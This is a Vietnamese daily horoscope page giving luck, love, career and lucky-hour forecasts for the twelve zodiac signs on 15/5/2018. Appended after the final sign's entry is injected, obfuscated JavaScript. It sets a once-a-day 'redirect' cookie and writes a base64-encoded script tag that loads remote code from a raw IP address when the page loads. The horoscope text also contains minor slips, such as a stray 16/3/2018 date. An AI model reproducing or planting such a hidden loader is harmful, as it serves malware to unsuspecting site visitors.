Ngày mai 15/5: Ngày Thứ Ba cực kỳ thuận lợi, may mắn cho 5 con giáp này, cầu gì được nấy

Mời bạn xem tử vi 12 con giáp ngày 15/5/2018 thứ 3 hôm nay. Dự báo những thay đổi vào ngày mới có thể giúp bạn tìm kiếm vận may, chủ động hơn trong cuộc sống và để mỗi ngày trở nên tốt đẹp hơn.

Ngày mai 15/5, 5 con giáp này sẽ đón nhận nhiều may mắn trong công việc lẫn chuyện tình cảm tuy nhiên vẫn chưa thể gọi là hoàn hảo. Hãy cùng xem tử vi ngày mai của 7 con giáp này nhé:

Tuổi Dần

Ngũ hành Mộc Thổ xung khắc, tử vi thứ 3 dự báo đường tình duyên của tuổi Dần trục trặc khiến tinh thần bất ổn không yên. Bản mệnh tốn quá nhiều thời gian vào công việc nên không quan tâm, chăm sóc đủ đầy cho nửa kia, mâu thuẫn liên miên khiến mối quan hệ ngày càng gay gắt.

Đường công danh sự nghiệp lên như diều gặp gió nhờ Chính Ấn hỗ trợ. Tuổi Dần được cấp trên ưu ái nhiều trong công việc, có cơ hội thể hiện năng lực cũng như khả năng xử lý tình huống trong công việc trên nhiều lĩnh vực khác nhau.

Người độc thân cảm thấy tiếc nuối vì đã để lỡ quá nhiều mối nhân duyên tốt đẹp đến với mình. Song thay vì trách bản thân thì bạn nên mở rộng lòng mình hơn, giảm bớt tiêu chuẩn, tự tạo cơ hội để nắm giữ hạnh phúc cho chính mình.

Giờ tốt trong ngày: 19h – 21h
Quý nhân phù trợ: Tuất, Hợi

Tuổi Mão

Theo tử vi hàng ngày 12 con giáp cho biết, tuổi Mão hôm nay nắm quyền lực trong tay và có thêm những trọng trách mới. Sau những lúc căng thẳng bạn đã bắt đầu tìm được cách thoát ra và không ngừng trau dồi năng lực bản thân.

Tam hợp cục nâng đỡ vận trình tình duyên của con giáp này rất tốt đẹp. Tình yêu đôi lứa ngày càng tiến triển tích cực, sự tăng tiến này có thể đưa đến những tin vui trong tương lai sắp tới.

Với người độc thân thì được quý nhân trao cho cơ duyên gặp gỡ, làm quen với đối tượng khác phái. Nếu tuổi Mão biết cách nắm bắt thì không khó để tìm được người cùng tâm đầu ý hợp. Tình duyên đôi khi không chỉ cần số mệnh mà còn cần sự tỉnh táo của chính người trong cuộc.

Giờ tốt trong ngày: 15h – 17h
Quý nhân phù trợ: Sửu, Hợi

Tuổi Tị

 

Tử vi 12 con giáp dự báo tuổi Tị được quý nhân trao cho cơ hội thăng tiến trên con đường công danh sự nghiệp. Hôm nay bạn làm gì cũng thuận lợi, suôn sẻ lại thêm khả năng cá nhân được dùng trong đúng môi trường phù hợ thì ngày càng phát đạt.

Tuy nhiên đường tài lộc lại có dấu hiệu sa sút, tốt nhất nên có sự cân nhắc kỹ càng trước những quyết định liên quan đến chuyện tiền bạc. Bản mệnh tin người dễ bị kẻ xấu đưa đẩy dẫn đến mắc sai lầm khiến tiền bạc tiêu tán.

Ngũ hành sinh xuất khiến tình duyên cũng có phần kém sắc. Nếu đã có đôi có cặp thì nên thông cảm và thấu hiểu hơn cho đối phương, đừng vì những chuyện không đáng mà hiểu lầm nhau, khiến quan hệ ngày càng xa cách.

Giờ tốt trong ngày: 19h – 21h
Quý nhân phù trợ: Mão, Thân

Tuổi Ngọ

Mùi Ngọ lục hợp giúp chuyện làm ăn của tuổi Ngọ trong ngày thứ 3 phát triển thuận lợi, có lợi cho tài vận. Chuyện kiếm tiền khá dễ dàng, ngay chính bạn còn thấy ngỡ ngàng vì lộc lá tự rơi vào tay mình, tài lộc nhờ vậy mà gia tăng nhanh chóng.

Tuy nhiên chuyện tình cảm của con giáp này lại có chút vấn đề nảy sinh. Người độc thân mạnh mẽ và quyết đoán trong nhiều việc nhưng với tình cảm trai gái lại thất bại nặng nề. Hãy nhớ không phải lúc nào sự mạnh mẽ cũng được lòng đối phương, nó còn có thể khiến tình yêu chớm nở lại phai tàn.

Người có đôi nên đặt mình vào vị trí đối phương để suy nghĩ bớt ích kỷ và phiến diện đi. Điều bạn cho là đúng nhưng với người khác chưa chắc đã vậy, tuổi Ngọ phải nhìn nhận vấn đề từ nhiều góc độ thì mới đưa ra được những quyết định chính xác.

Giờ tốt trong ngày: 3h – 5h
Quý nhân phù trợ: Tuất, Hợi

Tuổi Mùi

Xem tử vi thứ 3 của tuổi Mùi được cát thần che chở lộc lá đầy nhà, tiền bạc đầy tay. Nếu bản mệnh theo nghiệp kinh doanh thì càng như diều gặp gió, buôn may bán đắt, khách hàng ra vào nườm nượp, doanh thu tăng lên chóng mặt.

Song có điều con giáp này cũng phải có con mắt nhìn người để phân biệt người tốt kẻ xấu. Người tươi cười với bạn chưa chắc đã là người tốt, đó có thể là cái bẫy mà họ giăng ra chỉ chờ bạn mất cảnh giác mà sập bẫy. Đừng bày hết mọi góc cạnh của mình ra cho người khác xem.

Sức khỏe của tuổi Mùi bị ảnh hưởng bởi Thổ khí vượng, nhất là những vấn đề liên quan đến hệ tiêu hóa. Cứ cố gắng ăn uống thuận theo tự nhiên là tốt, không nên gượng ép mình quá, ngoài ra cũng nên hạn chế thức khuya, suy nghĩ lo lắng quá nhiều.

Giờ tốt trong ngày: 5h – 7h
Quý nhân phù trợ: Thân, Hợi

Tuổi Thân

Được chính tài soi bóng, đường tài lộc hôm nay của tuổi Thân khởi sắc, thu nhập có phần tăng tiến. Tiền bạc rủng rỉnh trong tay, bạn có thể tính tới chuyện đầu tư kiếm lời, để tiền bạc sinh sôi nảy nở thay vì để “chết” trong ngân hàng.

Ngũ hành tương sinh là cơ hội tốt để bản mệnh tìm thấy tình duyên cho mình. Nếu còn độc thân thì hãy chủ động tích cực lên mới rũ bỏ được tình trạng hiện tại để đến với tình yêu. Quá khứ đã qua hãy để nó chìm sâu trong dĩ vãng, đừng nhìn lại mà hãy hướng về phía tương lai.

Người đã có gia đình sẽ cảm thấy tình cảm gắn kết hơn trước, sự quan tâm chăm sóc của nửa kia khiến bạn cảm thấy ấm lòng. Tình yêu của hai người được vun đắp qua ngày tháng càng tỏa hương thơm ngát như một đóa hoa.

Giờ tốt trong ngày: 9h – 11h
Quý nhân phù trợ: Dậu, Tý

Tuổi Hợi

Mùi Hợi tam hợp trao cho con giáp này nhiều cơ may trên con đường tài lộc. Tiền bạc ào ào đổ về nhà hay những cơ may hiếm có mà không phải ai cũng dễ dàng có được, nhờ vậy mà bản mệnh thu được một khoản không hề nhỏ.

Đường công danh sự nghiệp của tuổi Hợi cũng được chính quan trợ lực. Bạn làm việc với tinh thần trách nhiệm cao, dù vẫn vấp phải những khó khăn nhất định nhưng không vì thế mà nản lòng, trái lại bạn vẫn cố gắng hết mình hoàn thành đúng như dự kiến.

Qua sự việc này, cấp trên thấy tin tưởng và trao cho tuổi Hợi thêm nhiều cơ hội để phát triển hơn trong công việc. Song hành với nó là những áp lực đè nặng lên vai nhưng bạn vẫn không ngừng nỗ lực học hỏi, nhờ vậy mà thành công nối tiếp thành công dù có chuyện gì xảy ra đi chăng nữa.

Giờ tốt trong ngày: 3h – 5h
Quý nhân phù trợ: Sửu, Mùi

Ngược lại 5 con giáp còn lại, ngày mai lại là ngày không quá tệ nhưng cũng không quá xấu. Hãy cùng xem tử vi ngày 15/5 của 5 con giáp còn lại để có cách mà né tránh nhé:

Tuổi Tý

Ngày Tý Mùi tương hại, tử vi phương Đông dự báo công việc của tuổi Tý bị tiểu nhân rình rập phá hoại. Bản mệnh cần tỉnh táo trong mọi việc cũng như các mối quan hệ xã giao, tránh tin lầm người xấu mà rước họa vào thân.

Kẻ tiểu nhân này còn có thể đem tới thị phị, gây hại cho thanh danh của con giáp này. Tuổi Tý lại là người có trách nhiệm với công việc nên thường nhận hết trách nhiệm về mình, điều này có thể khiến bạn lâm vào rắc rối.

Dám nhận trách nhiệm là tốt, song bạn nên xác định rõ đâu là trách nhiệm của mình chứ vơ hết mọi chuyện vào mình chỉ thiệt thân. Bao công sức cố gắng cuối cùng lại bị xóa bỏ hết chỉ về lỗi lầm không phải do mình gây ra.

Giờ tốt trong ngày: 15h – 17h
Quý nhân phù trợ: Thân, Tuất

Tuổi Sửu

Tử vi ngày 16/3/2018 tuổi Sửu gặp ngày tương xung, công việc có thể gặp phải trở ngại nếu không biết tiết chế cảm xúc của mình. Sự nóng giận chỉ giúp bạn thỏa mãn về mặt cảm xúc nhưng không giải quyết được vấn đề.

Tuổi Sửu không nhận thức được vấn đề mình đang gặp, người khác cho lời khuyên còn cố chấp không nghe, cứ làm theo ý mình. Điều này khiến sai lầm nối tiếp sai lầm, đến khi không còn đường lui thì chuyện thất bại là khó tránh khỏi.

May thay con giáp này không phải lo lắng quá nhiều về vấn đề tài chính. Người buôn bán kinh doanh được phù trợ, buôn may bán đắt bất ngờ, tuổi Sửu biết giữ chữ tín với khách hàng nên tiếng lành đồn xa, khách hàng tìm đến tới tấp.

Giờ tốt trong ngày: 5h – 7h
Quý nhân phù trợ: Hợi, Tị

 

 

Tuổi Thìn

Tử vi hôm nay của tuổi Thìn nhắc nhở con giáp này nên kiềm chế cảm xúc, tránh để sự nóng giận chi phối bản thân trong công việc, đưa ra những quyết định sai lầm. Chỉ một chút sơ suất cũng ảnh hưởng nghiêm trọng đến công việc hiện tại của bạn.

Để tránh công việc chồng chéo lên nhau, tuổi Thìn cần sắp xếp công việc hợp lý. Ngoài ra cũng nên kết hợp nghỉ ngơi điều độ, đừng để bản thân bị quá tải vì không đủ sức lo cho tất cả mọi việc. Giải quyết từng việc một, ưu tiên những việc cấp bách trước mới là lựa chọn sáng suốt của bản mệnh lúc này.

Thổ khí đương vượng mang đến những nguy cơ về sức khỏe cho con giáp này. Ngoài việc nghỉ ngơi điều độ thì tuổi Thìn nên chú ý những bệnh liên quan đến đường tiêu hóa, loại bỏ những thói quen ăn uống không lành mạnh dễ gây ra các chứng bệnh đó.

Giờ tốt trong ngày: 9h – 11h
Quý nhân phù trợ: Dậu, Tý

 

 

 

 

Tuổi Dậu

Xem bói tử vi hôm nay tuổi Dậu được Thiên Tài trợ vận nên dễ dàng giành được tài lộc về tay mình bằng nhiều cách. Bản mệnh là người thông minh, nhanh trí nhất là trong những lúc đòi hỏi phản ứng linh hoạt để giải quyết vấn đề.

Trong ngày thứ 3 này dù là người làm công ăn lương hay buôn bán kinh doanh cũng đều có nguồn thu tăng vọt. Tuổi Dậu có thể chi tiêu một chút cho bản thân và gia đình, đồng thời tìm hiểu thêm thông tin để đầu tư sinh lời trong thời gian tới.

Ngũ hành Thổ sinh Kim càng khiến cho vận trình tình cảm của con giáp này thêm rực rỡ. Tình duyên nở rộ, đào hoa khoe khắc, tuổi Dậu đắm chìm trong hạnh phúc ngọt ngào, có người để yêu và được yêu, được người khác chăm sóc nâng niu.

Giờ tốt trong ngày: 19h – 21h
Quý nhân phù trợ: Thìn, Tị

Tuổi Tuất

Vận trình ngày mới của tuổi Tuất có phần ảm đạm, công việc đang tiến triển bỗng chốc lại không được suôn sẻ cho lắm. Hơn nữa con giáp này tinh thần không được tốt, làm việc thiếu tập trung nên gặp phải nhiều sự cố đáng tiếc.

Đường tình duyên cũng có phần kém sắc, Mùi Tuất tương hình là lý do khiến bạn phải đối diện với khó khăn này. Sự thẳng thắn có thể khiến bạn được nhiều người khen ngợi nhưng đối với chuyện tình cảm thì lại không được phù hợp cho lắm, khiến bạn dễ mất điểm trước mắt đối phương.

Tuổi Tuất nên chú ý lời ăn tiếng nói cũng như hành động của mình, đừng nghĩ rằng tình cảm đã sâu đậm mà vô tình làm tổn thương nhau. Khi bạn quan tâm tới người nào đó thì lại càng phải để ý đến những nhận xét, ý kiến của người ấy về mình.

Giờ tốt trong ngày: 5h – 7h
Quý nhân phù trợ: Dần, Ngọ #(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Leave a Reply

Your email address will not be published. Required fields are marked *

This carousel is empty, please add some logos.